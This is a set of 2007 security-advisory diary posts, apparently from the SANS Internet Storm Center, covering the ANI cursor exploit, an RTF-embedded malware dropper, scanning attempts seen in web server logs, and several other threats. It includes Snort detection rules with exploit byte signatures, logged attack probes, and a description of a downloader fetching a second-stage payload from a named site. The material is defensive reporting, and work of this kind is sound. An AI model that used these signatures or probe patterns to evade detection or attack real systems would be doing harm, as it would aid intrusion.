Published: 2007-03-31

ANI: It Gets Better

McAfee is now reporting a spam campaign that includes an ANI exploit attempt:

"March 31, 2007. The .ANI File Format vulnerability has seen an increase in exploit attempts in-the-wild. McAfee Avert Labs has detected many Web sites linking to other sites that attempt to exploit this vulnerability. We have also observed a spam run that tries to lure its recipients to Web sites hosting code exploiting this vulnerability. Technical details and exploit code can now be easily obtained from these malicious Web sites. Following links in unsolicited e-mails and visiting unknown Web sites are strongly discouraged."

This will affect email clients on vulnerable Operating Systems that render HTML.  Exploit could occur when the malicious message is either opened, previewed, or forwarded.


If you open up a folder with Explorer (not Internet Explorer) that has a malicious .ANI file (file-extension matters in this case) it will exploit the system.  At least automated processes won't trigger execution (unlike WMF.) (US-CERT Advisory)


Published: 2007-03-31

Chinese Internet Security Response Team Reports ANI Worm

The Chinese Internet Security Response Team reports the detection of an worm-like payload installed using the ANI-exploit.  According to their report:

"It has the same behavior as Worm.Win32.Fujacks. It also can infects .HTML .ASPX .HTM .PHP .JSP .ASP and .EXE files, and inserts the malicious links which contained Windows Animated Cursor Handling zero-day vulnerability into .HTML .ASPX .HTM .PHP .JSP .ASP files. It also can send out Chinese spams which are include the same zero-day vulnerability link."

They recommend that the following domains be blocked to contain this particular variant:


Published: 2007-03-31

April 1: DST phase 2 and April Fools' Day

Remember all of those devices you manually set the clock on a few weeks ago?  You know, your Windows 2000 servers, etc.?
Hopefully you do, since tomorrow, all of your unpatched systems will "spring forward" per their original programming.

Tomorrow also denotes the celebration of April Fools' Day, often observed with practical jokes and hoaxes.  In the past, the handlers have observed this "holiday" with humorous posts.  I've been informed that we will not be participating this year because of heightened INFOCon.  Not everyone is going to follow that suggestion, so be aware of what your read tomorrow.


Published: 2007-03-31

*ANI exploit code drives INFOCon to Yellow

The ANI vulnerability has been been of recent concern.  I've been waiting for a few key events to be confirmed before adjusting the INFOCon.  We don't take these decisions lightly.

Rating systems such as Symantec's ThreatCon (currently at 2 of 4,)  FS/ISAC's Cyber Threat Advisory (currently at Guarded,) and our INFOCon (now at Yellow) all have their particular niche.  Symantec focuses on their AV and managed-security-service customers.  FS/ISAC focuses on financial institutions.  The Internet Storm Center's INFOCon intent is to "to reflect changes in malicious traffic and the possibility of disrupted connectivity."

In the initial stages of this event, we did not satisfy the criteria to raise the INFOCon level.  Now, we have a different landscape.

  • Exploit code has been publicly released which allows trivial modification to add any arbitrary payload.
  • The number of malicious sites reported is rising rapidly, limiting the efficacy of blocklisting.
  • The number of compromised sites pointing to malicious sites is also on the rise.
  • Keep anti-virus up-to-date.  So far this is the most effective layer, particularly generic signatures that detect non-compliant ANI files.  Also, the secondary payloads downloaded by these exploits are often detectable (not always though.)
  • Content-filtering.  If your environment supports it, dropping ANI files (not based on file extention, but actual file-inspection) may be prudent until patches are deployed.  This will impact your myspace.com browsing experience though.
We intend to maintain INFOCon Yellow status and reassess every 24 hours. (~1400 UTC)


Published: 2007-03-30

Detecting and filtering out windows animated cursor exploitation attempts

I recommend a defense in depth approach. Do not rely on just one level of detection or filtering use as many as feasible.

Many commercial Antivirus products detect some or all of these exploits.
Make sure your Antivirus engine and signatures are up to date.
That will greatly increases your chances of blocking an exploit.

IDS rules:

Bleeding Edge Snort IDS rule for the currently observed JPEG renamed ANIs is available at

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:”BLEEDING-EDGE CURRENT EVENTS MS ANI exploit”; flow:established,to_server; content:”|54 53 49 4C 03 00 00 00 00 00 00 00 54 53 49 4C 04 00 00 00 02 02 02 02 61 6E 69 68 52|”; classtype:attempted-admin; reference:url,http://isc.sans.org/diary.html?storyid=2534; reference:url,http://www.avertlabs.com/research/blog/?p=233; reference:url,doc.bleedingthreats.net/2003519; sid:2003519; rev:1;)

From sourcefire this rule is in all VRT certified rulesets, including the free ruleset, and has been out since Jan 2005.

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-CLIENT Microsoft ANI file parsing overflow"; flow:established,from_server; content:"RIFF"; nocase; content:"anih"; nocase; byte_test:4,>,36,0,relative,little; reference:cve,2004-1049; classtype:attempted-user; sid:3079; rev:3;)

Several other commercial filtering products detects these exploit attempts.
Once again updated signatures and engines will increase your chances of detecting them.

Based on the similarities I have seen between exploits there is probably a tool that creates the ani exploits so domain blocking or blocking based on MD5s has have value but may be difficult to manage and maintain.
I would still recommend blocking the domains or MD5 being used on a router, firewall, dns where ever you can block them.
Some of these sites may be victims themselves but some of these have been serving up malware for a LONG time.
The bc0.cn site was used in the Dolphin's Superbowl infection http://isc.sans.org/diary.html?storyid=2151.
Even if you do not block them you may wish to review your proxy logs for these.

Domains/IPs currently being used in exploitation:

MD5s for malware related to ANI exploitation:

Finally A big THANK YOU to all the people who submitted sites or binaries.


Published: 2007-03-30

Ani cursor exploits against Microsoft E-mail clients - CVE-2007-1765

A short overview of how the different email clients (in the supported list of Microsoft) are reacting to the animated cursor vulnerability (CVE-2007-1765) depending on the actions and settings of the email client.

The surprising element is that read in plain text mode makes some of the clients more vulnerable and actually only offers real added value -for this vulnerability- for Outlook 2003.

  Default Settings Read in
plain text mode
Reply/Forward with
"Read in Plain Text" set
Windows XP Outlook Express preview
Vulnerable(*) Vulnerable Vulnerable
Windows XP Outlook Express open Vulnerable(*) Vulnerable Vulnerable
Vista Mail preview Vulnerable   Vulnerable
Vista Mail open Vulnerable   Vulnerable
Outlook 2003 preview Vulnerable    
Outlook 2003 open Vulnerable    
Outlook 2007 preview      
Outlook 2007 open      

(*) It does interact with the user before being vulnerable, but we all know what typical users would do.

Swa Frantzen -- NET2S


Published: 2007-03-29


We've received a number of reports of spam appearing to come from "admin@microsoft.com" containing a link to a file called IE7.0.exe .

This is what VirusTotal has to say about it:

Antivirus Version Update Result
AhnLab-V3 2007.3.30.0 20070329 -
AntiVir 20070329 TR/Proxy.Agent.CL
Authentium 4.93.8 20070329 -
Avast 4.7.936.0 20070329 -
AVG 20070329 -
BitDefender 7.2 20070329 -
CAT-QuickHeal 9.00 20070329 (Suspicious) - DNAScan
ClamAV devel-20070312 20070329 -
DrWeb 4.33 20070329 -
eSafe 20070329 -
eTrust-Vet 30.6.3522 20070329 -
Ewido 4.0 20070329 -
F-Prot 20070328 -
F-Secure 6.70.13030.0 20070329 Virus.Win32.Grum.a
FileAdvisor 1 20070330 -
Fortinet 20070329 suspicious
Ikarus T3.1.1.3 20070329 -
Kaspersky 20070329 Virus.Win32.Grum.a
McAfee 4995 20070329 -
Microsoft 1.2306 20070329 -
NOD32v2 2154 20070329 -
Norman 5.80.02 20070329 -
Panda 20070329 Suspicious file
Prevx1 V2 20070330 Covert.Sys.Exec
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=c9a385855469
Sophos 4.16.0 20070329 -
Sunbelt 2.2.907.0 20070329 VIPRE.Suspicious
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
Symantec 10 20070330 Trojan Horse
TheHacker 20070323 -
UNA 1.83 20070316 -
VBA32 3.11.3 20070329 suspected of Trojan-PSW.Pinch.1 (paranoid heuristics)
VirusBuster 4.3.7:9 20070329 -
Webwasher-Gateway 6.0.1 20070329 Trojan.Proxy.Agent.CL

Name IE7.0.exe
Size 33280
md5 8e12a8281a6c6ebdbd75c26a93e69437
sha1 de94c34d51e8c04df174e27bc04eed134aca57d7
Date scanned 03/30/2007 00:22:04 (CET)

Norman Sandbox doesn't detect it and it seems to not want to run in certain virtual machines either.

Check your logs on proxy servers etc. for IE7.0.exe, it's being hosted in multiple places around the world.

Thanks to Dan, Brian, Sean, Richard and many other readers.

Swa Frantzen --- NET2S


Published: 2007-03-29

Windows Animated Cursor Handling vulnerability

Microsoft has released advisory 935423 regarding a vulnerability in Windows Animated Cursor Handling. A bug in the way Windows deals with  animated cursor files can allow execution of arbitrary code under the user that downloaded the malicious file.

Affected are Win2k SP4, XP SP2, Server 2003 and Vista. We have received reports of this vulnerability being exploited in the wild. While Animated cursors are usually downloaded as .ani files, blocking these files would not be sufficient to mitigate the vulnerability.

The vulnerability has been added to our missing microsoft patches table.


Published: 2007-03-29

Cisco VoIP vulnerabilities.

Cisco announced software updates to address 5 Cisco Bug IDs for 3 separate DOS vulnerabilities that affect two of their VoIP products.
Cisco Security Advisory: Multiple Cisco Unified CallManager (CUCM) and
Cisco Unified Presence Server (CUPS) Denial of Service Vulnerabilities

Advisory ID: cisco-sa-20070328-voip

Vulnerable Products
* Cisco Unified CallManager 3.3 versions prior to 3.3(5)SR2a
* Cisco Unified CallManager 4.1 versions prior to 4.1(3)SR4
* Cisco Unified CallManager 4.2 versions prior to 4.2(3)SR1
* Cisco Unified CallManager 5.0 versions prior to 5.0(4a)SU1
* Cisco Unified Presence Server 1.0 versions prior to 1.0(3)

There are no workarounds.

Filtering traffic as follows for affected CUCM / CUPS systems can be used as a mitigation technique:

Permit TCP port 2000 (SCCP) and TCP port 2443 (SCCPS) to CUCM systems only from VoIP endpoints.

ICMP Echo Requests (type 8) should be blocked for CUCM and CUPS systems. This may affect network management applications and troubleshooting procedures.

UDP Port 8500 (IPSec Manager) should only be permitted between CUCM / CUPS systems configured in a cluster deployment.


Published: 2007-03-28

Dangerous document formats and social engineering

If you’ve been reading our diaries for last couple of months, no doubt that you are aware of the huge number of exploits directed toward various Office applications, mainly Microsoft Word and PowerPoint. For quite some time a lot of administrators (us included) told people to convert documents to other (safer) formats, one of them being RTF (Rich Text Format). Although this format is proprietary, the specification is publicly available so a lot of word processors support this format.
Our reader Mike Armstrong reported a phishing e-mail he received from the Better Business Bureau. The e-mail contained a link to a site which hosted an RTF document. As this immediately looked suspicious (a completely unrelated web site hosted just the RTF document, nothing else), I decided to spend more time analyzing this. The file was located on http:// www. nightcrossings.com/[REMOVED].

Embedding everything

As you all know, complexity and security don’t go good together. Nevertheless, lately we can see a trend of embedding everything in anything which leads to increased complexity as well. Microsoft Word documents that carry images and videos are completely normal now.
While RTF is a more human readable format (it is a plain, ASCII file at the end), this does not prevent it from embedding objects that can be very dangerous, as we will see.
So, the picture below shows how Microsoft word will open the file Mike submitted:


As you can see, this will work in any version of Microsoft Office (I used the latest and greatest Office 2007). The text and the icon shown on the screen shot are all part of a single object that is embedded in this document. This is a fine example of a social engineering attack – the attacker tried to lead the victim into thinking that an error occurred in Microsoft Word and that the file (the object) should be double clicked to fix this.
Luckily, Microsoft added at least another layer of protection here (although, to be honest, why would anyone allow a text based format to drop a file and execute it is beyond me). If our trigger happy user double clicked on the object, he would be greeted with the following alert:


I will not go into the discussion if this would prevent him from starting the file or not, but at this point in time, his last (and only) defense is the Anti-virus program (more about that below).

Malware analysis

It is relatively easy to extract embedded objects from an RTF file. Microsoft Word comes with an application called Object Packager. This application can be accessed for every embedded object and all you have to do is right click on the object and start it. You can see below what it reports for this document:


Object Packager was actually used by the attacker as well – first the file was attached and then the appearance was modified. Same way as it was attached it also allows us to save it so we can analyze what’s inside.
If you know of an external utility that can analyze RTF files please let us know – ideally it would be a perl script (some perl modules exist for parsing RTF files but I haven’t found a nice utility that allows extraction of embedded objects such as this one in one step).
The dropped file is (you can probably guess) a downloader. Once executed it downloads http:// www. nightcrossings.com /[REMOVED]/inv.exe which looks like a spamming tool (it’s a big 1.5MB download of an executable written in Delphi that I haven’t thoroughly analyzed).

AV protection and file parsing difficulties

Distributing innocent looking files with embedded malware sounds very interesting for attackers. Once I extracted the dropper and downloaded the second stage binary, I ran all of them through Virus Total to see what (if any) detection is. The results were pretty bad and showed that a lot of anti-virus products either had problems with parsing RTF or couldn’t parse them at all which caused them to miss the dropper (some AV programs would hopefully catch it once the user executed the file).
The images below show VT results from scanning the RTF document and the dropper that is embedded in it (after it has been extracted as a standalone file):

The dropper itself was detected as:

Finally, the second stage binary was undetected by almost all AV vendors – hopefully they’ll add detection for this soon:
This was another example of why complex file formats should be avoided. Even if you do scan all files on your e-mail gateway (or web filtering server), as you can see most AV programs would miss this as they would scan only the RTF document. One more time we see how important defense in depth is – in this case you would depend on user’s awareness and ultimately on his desktop AV product.


Published: 2007-03-28

Microsoft XP Change Analysis Diagnostic Tool

Earlier today I came across a new tool that might be useful to InfoSec professionals.  Though it is not a "security" tool, it can be used by support people to help better understand the modifications that may have occurred to a particular system.  Once installed the tool will scan the computer looking for specific types of changes to the computer including....

  • Software Programs which are listed in the Add/Remove Program control panel
  • Operating System Components including Hotfixes or updates from Microsoft Update
  • Browser Helper Objects and other COM components loaded in Internet Explorer
  • Drivers
  • ActiveX Controls   and
  • Other Auto-Start Extensibility Points
It creates a nice little XML file that you can use for a variety of purposes.

However in my testing on my laptop, I have found that some software packages appear to make changes in more places then I even knew was occurring. For example,  Symantec Antivirus Corporate Edition changes the path to certain driver files with virus definition updates.  These will be reported as:
Changed from "\??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20070326.020\navex15.sys" to "\??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20070327.019\navex15.sys"
Adobe Acrobat apparently also makes regular modifications to the startup folder for its Speed Launcher program.

Even with these items that may need to be ignored depending on the support issue at hand, the tool may be very useful for determining what end users may have done to their computer.  This eliminates the user's need to accurately articulate the changes to you, if they actually admit to changing something.  For more information on the tool, please see KB Article 924732 at support.microsoft.com.


Published: 2007-03-28

Jikto - The Javascript based bot

Billy Hoffman, a security researcher at SPI Dynamics presented a new tool called Jikto at ShmooCon. The tool exploits Cross Site Scripting (XSS) vulnerabilities which tricks victim into running malicious code. The code is injected into the victim's browser where it runs silently. It either seeks more XSS vulnerable targets and reports back to the attacker or it can also report back to the bot controller and await further commands.

Since Javascript is OS independent, this tool will run well on browsers running on different OS platforms. With Cross Site Scripting flaws being one of the most common vulnerabilities reported these days, it is easy to understand the potential effects of a toolkit like this.

Although Billy did not release the tool to the public, the attack principles have been well understood amongst the security research community. Most researchers believe this proof of concept will very likely become real attacks shortly.

Links to the article here and here.

If you want to learn more about web attack techniques such as this, SANS offers Sec 519 - Web Application Security Workshop.


Published: 2007-03-27

Metasploit Framework 3.0 Released

The Metasploit Project released new Metasploit Framework 3.0 today. It is one of best tools to perform penetration tests system administrators to verify patch installations product vendors to perform regression testing.
The version 3.0  contains 177 exploits 104 payloads 17 encoders and 3 nop modules. Additionally 30 auxiliary modules are included that perform a wide range of tasks including host discovery protocol fuzzing and denial of service testing.

The new version is available The Metasploit Framwork site.

Kevin Hong.


Published: 2007-03-26

WPAD trouble

Hacker conferences are more often than not a source of work for security people. When Microsoft issued MS99-054 (fixing CVE-1999-0858) one would have assumed they had looked into the auto-configuration of MSIE's proxy settings deep enough to not have to fix it again. Unfortunately no such luck was with us.

wpad names in DNS or WINS that are inserted by malicious locals are enough to divert browsers to an unauthorized proxy. Apparently the issue is bad enough for Microsoft to release KB 934864 about it.

To summarize to use WPAD yourself in your DHCP:

  • dhcpd:
    add this to your config:
option option-252 "http://example.com/path/to/proxyconfig.pac";
option wpad code 252 = text
option wpad "http://example.com/path/to/proxyconfig.pac";
See more in the recently expired IETF draft.

If you can't do that, create a DNS TXT record with the name WPAD in every domainname you run to avoid MSIE finding a host with that name and do the same in WINS. (see the above mentioned KB for how to do it in Microsoft's implementations)

We've added this vulnerability in our overview table.

Swa Frantzen -- NET2S


Published: 2007-03-26

SANS Software Security Institute

SANS (same 'SANS' as the one behind the 'SANS Internet Storm Center' ;-) ) today announced the "SANS Software Security Institute". The idea behind the "SANS-SSI" is to offer a number of different assessment tests. Programmers can take these tests to identify skill gaps. Tests will be offered for various languages. Right now, a short free sample test is offered for C/C++ and Java. See the SANS-SSI website (www.sans-ssi.org) for more details.


Published: 2007-03-26

The first day in the life of a website

It has been a rather long time since I had to set up a website from scratch so I was rather amazed when I started looking at the logs of a system which went live around 15:00 CET last Saturday.

The setup, a standard Apache running on OpenBSD 4.0, consists of an SSL password-protected virtual host, a single page redirecting from the non-SSL virtual host to the SSL version if you forget the 's' and a blank page waiting for connections on the direct IP address without the correct Host: directive.

The interesting logs are obviously the ones for the direct IP address accesses...

The preamble

83.180.231.X - [24/Mar/2007:15:12:30 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv: Gecko/20070223 Camino/1.1b"
217.172.253.X - - [24/Mar/2007:15:43:33 +0100] "GET / HTTP/1.0" 200 274 "-" "-"
217.172.253.X - - [24/Mar/2007:16:30:06 +0100] "GET / HTTP/1.0" 200 274 "-" "-"
208.11.16.X - - [25/Mar/2007:01:05:00 +0100] "\x10\x01" 501 - "-" "-"
217.172.239.X - - [25/Mar/2007:12:39:37 +0200] "GET / HTTP/1.0" 200 274 "-" "-"
82.165.42.X - - [25/Mar/2007:15:11:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0"

So, the first one, no prizes for guessing correctly, would be yours truly testing that the site works (hey, I actually have a valid User-Agent!).

Barely 20 minutes later someone visits a completely unannounced website with no www.domain CNAME assigned to it from Poland (hi there!), twice, from the same IP on some DSL provider in Lodz.  Then, someone from the USA visits, middle of the night for me, comfortable mid-morning coffee script-kidding for him, sitting on wythenet.com trying a nice hex escape to try and tickle the server for information. Then around midday our friend from Poland comes again (my dear chap you might benefit from a database to archive the info...) but from a different net and "closing the first day of life" we are visited by a well-hacked server in Germany.

Making good(?) use of the collected information

So, after the in-depth mapping of the server (which is, incidentally running nothing bar Apache, no modules, ServerTokens appropriately set, etc.) the first script kiddie "attacks":

208.11.16.X - - [25/Mar/2007:16:24:36 +0200] "GET /phpmyadmin/main.php HTTP/1.0" 404 295 "-" "-"
208.11.16.X - - [25/Mar/2007:16:24:36 +0200] "GET /phpMyAdmin/main.php HTTP/1.0" 404 295 "-" "-"
208.11.16.X - - [25/Mar/2007:16:24:36 +0200] "GET /db/main.php HTTP/1.0" 404 287 "-" "-"

So this is the gentleman coming in from the USA who has gathered the data from his "scan" and is now attacking the sites after breakfast (his breakfast of course, middle of the afternoon for Europe).  He is finished quite quickly:

208.11.16.X - - [25/Mar/2007:16:25:21 +0200] "GET /admin/phpMyAdmin-2.6.4-rc1/main.php HTTP/1.0" 404 311 "-" "-"

To make the Sunday more interesting we have someone trying to SSL brute force the server:

194.235.70.X - - [25/Mar/2007:17:17:25 +0200] "GET /sumthin HTTP/1.0" 404 283 "-" "-"

The line above is the signature of the ATD OpenSSL Mass Exploiter and if you bother looking for the IP address on Google you will see that the particular sort-of-obfuscated IP has been active for a while (and has now finally been reported to the guilty party).

What about day 2?

Monday morning is boringly quiet until after lunch when we have someone looking for FrontPage vulnerabilities:

85.25.140.X - - [26/Mar/2007:14:33:35 +0200] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 404 316 "-" "core-project/1.0"

I guess the logic might be "new host, middle of a large colo block, could well be FrontPage...", seems to be a one-off but comes from one of those large server4you farms in Germany so could well be the result of the European scanning on Saturday.

Obviously 24 hrs must be the standard "nobody checks their logs for that long" period because our last visitor from Sunday now returns and plays PHP games:

82.165.42.X - - [26/Mar/2007:15:30:14 +0200] "GET / HTTP/1.0" 200 274 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
82.165.42.X - - [26/Mar/2007:15:30:15 +0200] "POST /index.php HTTP/1.0" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
82.165.42.X - - [26/Mar/2007:15:30:15 +0200] "POST /wbb2/index.php HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
82.165.42.X - - [26/Mar/2007:15:30:15 +0200] "POST /board/index.php HTTP/1.0" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"

Welcome back!

Somewhat more thorough than our US scanner he is done faster since he is on a faster and very close (three hops...) link to my server:

82.165.42.X - - [26/Mar/2007:15:30:35 +0200] "POST /database/main.php HTTP/1.0" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"

At which point the obvious observation is that these days you barely have the time to put a website up before it is visited, catalogued and exploited (fortunately with untargeted automated tools).

Reader quiz

Now, for extra points, who spotted the time change in the preamble where the timezone offset goes from GMT+1 (CET) to GMT+2 (CEST)?




Published: 2007-03-24

A Possible Data Breach at Romanian Finance Ministry

An ISC reader shared with us a link to a story reported by a Romanian news agency that seems to describe a data breach at Romanian Finance Ministry (thanks you!). According to him, the article discusses a vulnerability on the website of Romania's National Agency for Fiscal Administration (main unit of the Romanian Finance Ministry, equivalent of the IRS in the USA):
This vulnerability made available the full information about all of Romania's ~22 million citizens, including the Personal Number Code (CNP - "Cod Numeric Personal" - equivalent of the Social Security Number in the USA)
Even more, full identifying data of each tax payer is/was available. In addition to the CNP this also includes the full name, full address, and full finance information, including informations about taxes and duties paid to the state budget.
This sounds like a very severe breach. Unfortunately, we don't have a way of verifying the person's description of the article, and we cannot translate the article's text ourselves. If you have additional information about the breach, the reliability of the news reporting agency, or are able to translate key sections of the article, please let us know.

The article's text is available at:

-- Lenny

Lenny Zeltser
InfoSec Practice Leader
Gemini Systems, LLC


Published: 2007-03-24

Vista's Windows Mail - program execution - CVE-2007-1658

There is public discussion about a vulnerability in Microsoft Windows Vista's Windows Mail. It centers around crafted URLs that are able to start programs if a similarly named directory exists as well. Claims are made this works against both local resources and UNC paths (e.g. \\server\share\path\file ) which are intrinsically remote.

CVE-2007-1658 was assigned to this issue.

We're still seeking further information and will keep tracking this with the other publicly known unpatched vulnerabilities in Microsoft products.

Swa Frantzen -- NET2S


Published: 2007-03-24

Domain Appraisal Scam Targets Domain Name Owners

The Internet is abound with scams of all shapes, colors, and flavors. This note is about a domain appraisal scam that seems to be targeting domain name owners. Justin Hall sent us an email, describing the scam that targeted him recently. This note is based on his description of the scam, as well as on the accounts sprinkled throughout the web.

There are many accounts of this scam on the web. Although some details change from incident to incident, the key attributes, meant to confuse and misdirect the victim remain the same.

At the onset of the scam, the scammer emails the victim with an offer to purchase one of his or her domain names. According to one report, the note looks like this:
I found your name for sale on the web. Can you give me a price for the name in the subject line. Domain names is not my main business. Just another way to make money online on domain reselling.
The goal of the scam seems to be to direct the victim to appraise the domain name with an appraisal service of the  scammer's choice. However, rather than directly pointing the victim to a particular appraiser, the scammer directs the victim to a forum discussion about the most reliable appraisal service:
Of course, we must be sure that you are engaging a reputable appraisal company. I heard many appraisal companies often made inaccurate appraisals. I will only accept appraisals from independent sources I trust. I heard some appraisal companies often made inaccurate appraisals. To avoid mistakes I asked domain experts about reputable appraisal companies in a forum http://domaintalk.ourplace.com/Archive/261947.htm
All indications suggest that the forum discussion is bogus. The "forum" seems to be a static HTM page that is meant to look like a forum discussion. Discussions on real web forums about this scam indicate that there have been multiple versions of the bogus discussion, all hosted under http://domaintalk.ourplace.com/Archive, but using different file names.

Some of the bogus discussions are still available (95073.htm, 261947.htm, 98042.htm); others are not longer live. The discussions differ slightly, but all have the same pattern. The first message asks to recommend a good domain appraisal service:
Hi folks, I am going to invest money in several good names. I don't want to overpay so third party valuation is a must. Investing in good names is a new business for me. Can someone recommend me good appraisers?
A user "NameSeller" responds by mentioning a few appraisal services. After a few other messages, the apparent winner usually becomes securenamesale.com.

Public accounts of the scam state that even if the victim pays for an appraisal certificate from the service approved by the scammer, the scammer does not purchase the domain.

Is securenamesale.com a legitimate service? It's hard to say for sure, but the victims describing the scam on public forums are highly doubtful. The site sells domain appraisal software for $99. We located another site hosted on the same IP address and having the same content as securenamesale.com; it goes under the name allfordomains.com.

The ultimate objective of the scammer remains a bit unclear. The scammer probably benefits financially from the victim using the designated domain appraisal service, although it's possible that some other motives exist. If you have any specific information about this scam, please let us know.

-- Lenny

Lenny Zeltser
InfoSec Practice Leader
Gemini Systems, LLC


Published: 2007-03-24

Tracking Publicly-Announced Data Breaches

Prioritizing IT spending is hard. Increasing awareness for IT security risks among executive managers is not any easier. Breach notification laws, which have recently been enacted by many states in the US, help on both accounts.

In a nutshell, the laws require companies that suffered a breach of sensitive customer information to notify the affected individuals. This is one of the reasons we have been hearing so many announcements of such incidents. It's not that data wasn't being compromised earlier; it's just that now there are legal obligations for making the breached public.

Knowing the circumstances of publicly-announced breaches can help you identify and mitigate similar risks in your organization. An ISC reader wrote to us about one such situation, where he was asked to research incidents where a backup tape lost in transit resulted in a breach that led to identity fraud.

Although it's difficult to link  breaches to confirmed cases of identity fraud--such details are rarely made public--here are a few ways you can keep track of announced data breaches.
  • Attrition.org maintains a Data Loss Archive and Database, which records many potential instances of data breaches. The information is available as an RSS feed and in a CSV file.
  • Privacy Rights Clearing house maintains a list of data breaches, sorted in chronological order for 2005, 2006 and 2007.
  • About.com compiled a list that includes a number of data breaches announced in 2006 and 2007.
If you would like to know which US states have enacted breach notification laws, take a look at the detailed list maintained by the University of Georgia; it was last updated on October 1, 2006. Another list, updated on January 9, 2007, is maintained by National Conference of State Legislatures.

Here are a few more data points related to data breaches, which you may want to add to your arsenal:
  • According to the 2006 Annual Study: Cost of a Data Breach, conducted by The Ponemon Institute and sponsored by PGP Corporation and Vontu, the cost of responding to a data breach "averaged $182 per lost customer record." "The average total cost per reporting company was $4.8 million per breach and ranged from $226,000 to $22 million."
  •  A study of announced data breaches, conducted by Phil Howard and Kris Erickson at the University of Washington, found that almost 1.8 billion records were compromised from year 2000 to 2006. A draft of the paper is available for download and includes lots of other interesting details.

-- Lenny

Lenny Zeltser
InfoSec Practice Leader
Gemini Systems, LLC


Published: 2007-03-23

Gozi Trojan Steals SSL Encrypted Data for Fun and Profit

A few days ago Secureworks had a good write up on the Gozi trojan (thanks to ISC readers Bob and BB for pointing it out). This Russian malware beauty was doing the rounds and went undetected for some time. An estimate says the black market value of the data stolen is $2 Million. It spread through IE web browser exploits and was able to steal SSL encrypted traffic using Winsock2. The days of the keylogger look to be over, the game got more interesting.

Basically, what this malware did was insert itself between Internet Explorer and the socket used to send data.  It then stole the data prior to encryption and sent it to your happy local Russian hacker. While (I believe) this is the first real slick attempt to steal SSL data by inserting a listener to take the data pre-encryption, the technique is not new.  In fact, I wrote about this same tactic almost 2 and half years ago.

Encryption is meaningless if one of the endpoints of the communication is compromised. If you tunnel your transaction over SSL to a vendor who happily takes your data and sells it, the SSL won't help you.  The same goes true for home PCs which according to any definition of security are completely untrustworthy. There are plenty of techniques to grab data before it is encrypted. The neanderthal way is to use a keylogger. Now there are other techniques in use.

Until we find a way to get consumer PCs secure, or better yet, find a way for private financial data to be transmitted through a PC without the untrusted PC being able to compromise it, no electronic financial transaction will be secure. If the home PC isn't secure, all the encryption in the world won't help.

UPDATE: ISC Reader Nick suggests "Man at the Endpoint" as a name for this kind of attack.

John Bambenek / bambenek (at) gmail.com
University of Illinois at Urbana-Champaign


Published: 2007-03-23

The rise of the botnets

According to data by Shadowserver, the number of botnet-controlled machines has tripled in the last month. Specifically the jump seemed to start on March 8th or so and has kept going ever since.  For the most part, they haven't tracked a significant increase in the number of botnets (only about a 20% jump), just the number of machines. The biggest C&C nets are near New York, Southern California, and near Germany. The biggest concentrations of botnet infected machines are in China, Brazil, and Argentina.

So it appears botnet controllers are getting better at increasing the size of their herds.

John Bambenek / bambenek /at/ gmail.com
University of Illinois at Urbana-Champaign


Published: 2007-03-23

New SCADA Vulnerabilities in OPC Servers

Last night, 6 e-mails hit the Bugtraq list detailing vulnerabilities in OPC (OLE for Process Control) servers made by Takebishi Electric (vuln 1, vuln 2, vuln 3, vuln 4, vuln 5) and NETxAUTOMATION (vuln 1). The CVE entry for this is CVE-2007-1319 (for Takabishi) and CVE-2007-1313 (for NETxAUTOMATION).

OPC servers are used in SCADA systems (power grid, water system, etc) to consolidate network device info. These vulnerabilities allow for remote access to memory and could be used for remote code execution.  Authentication would be bypassed and an attacker could potentially take complete control of the OPC server. Because of the kind of applications OPC servers are used in, this vulnerability is important to remediate.

In all 6 cases, the vendor has an updates available for users to upgrade to.  The vulnerabilities were found during an OPC server assessment by Neutralbit for one of their customers. At present, there is no known exploit code in the fild.

If you are running either of these two vendors in your environment, you should upgrade immediately.
John Bambenek  bambenek /at/ gmail.com
University of Illinois at Urbana-Champaign


Published: 2007-03-22

From the Mailbag

From the Mailbag:

New Trojan?

Kathy writes:
"We've been hit in a major way by some type of password stealing trojan which is similar to Backdoor.Berbew.N" She goes on to say "The symptoms are the same as what's reported for Expiro.a - it appears to infect about every EXE on the local and all network drives. We're pretty sure the infection vector is through Windows file shares but haven't confirmed that. An infected workstation tries to go to various Russian web sites"

Virustotal shows ...

Antivirus Version Update Result
AhnLab-V3 2007.3.23.0 03.22.2007 no virus found
AntiVir 03.22.2007 no virus found
Authentium 4.93.8 03.22.2007 no virus found
Avast 4.7.936.0 03.21.2007 no virus found
AVG 03.22.2007 no virus found
BitDefender 7.2 03.22.2007 no virus found
CAT-QuickHeal 9.00 03.21.2007 (Suspicious) - DNAScan
ClamAV devel-20070312 03.22.2007 no virus found
DrWeb 4.33 03.22.2007 no virus found
eSafe 03.22.2007 no virus found
eTrust-Vet 30.6.3501 03.22.2007 no virus found
Ewido 4.0 03.22.2007 no virus found
FileAdvisor 1 03.22.2007 no virus found
Fortinet 03.22.2007 suspicious
F-Prot 03.21.2007 no virus found
F-Secure 6.70.13030.0 03.22.2007 no virus found
Ikarus T3.1.1.3 03.22.2007 Trojan-Downloader.Win32.Small.AIP
Kaspersky 03.22.2007 no virus found
McAfee 4989 03.21.2007 no virus found
Microsoft 1.2306 03.22.2007 no virus found
NOD32v2 2136 03.22.2007 no virus found
Norman 5.80.02 03.22.2007 no virus found
Panda 03.22.2007 Suspicious file
Prevx1 V2 03.22.2007 no virus found
Sophos 4.15.0 03.13.2007 no virus found
Sunbelt 2.2.907.0 03.22.2007 no virus found
Symantec 10 03.22.2007 W32.Kakavex
TheHacker 03.22.2007 no virus found
UNA 1.83 03.16.2007 no virus found
